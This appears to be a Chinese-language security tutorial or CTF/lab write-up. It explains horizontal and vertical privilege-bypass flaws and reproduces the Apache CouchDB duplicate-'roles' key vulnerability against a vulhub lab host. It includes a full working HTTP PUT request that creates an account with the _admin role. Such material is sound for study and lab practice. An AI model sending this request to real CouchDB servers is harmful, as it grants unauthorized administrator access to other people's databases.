越权漏洞

越权VS提权

​ 提权：使用技术手段将你从低权限用户提高到高权限(指的是计算机权限 用户权限→管理员权限)。

​ 越权：低权限用户，可以进行平级操作，甚至高权限操作。

概念

​ 是一种常见的逻辑安全漏洞。由于服务端对客户端提出的数据操作请求过于信任，忽略了对该用户操作权限的判定，导致可以修改相关参数可以拥有了其他账号的增删查改功能，从而造成越权漏洞。

​ 越权可分为水平越权和垂直越权。

水平越权指相同用户不同用户可以相互访问 垂直越权指低权限用户可以访问高权限用户

常见漏洞

1.通过修改GET传参来越权

2.修改POST表单来越权

3。修改cookie来越权

CouchDB 权限绕过

写在前面

该漏洞较为特殊，若想极速获取flag，建议直接下拉到EXP，一键梭

漏洞原理

Apache CouchDB是一个开源数据库，专注于易用性和成为”完全拥抱web的数据库”。它是一个使用JSON作为存储格式，JavaScript作为查询语言，MapReduce和HTTP作为API的NoSQL数据库。

导致漏洞的原因是Erlang和JavaScript，对JSON解析方式的不同，对于重复的键Erlang会存储两个值，而JavaScript只存储第二个值.

影响版本

小于1.7.0以及小于2.1.1

复现过程

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: 192.168.183.134:5984
Accept: _/_
Accept-Language: en
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Connection: close
Content-Type: application/json
Content-Length: 112
{
"type": "user",
"name": "vulhub",
"roles": ["_admin"],
"roles":[],
"password": "vulhub111"
}

账号vulhub密码vulhub111进入登录页面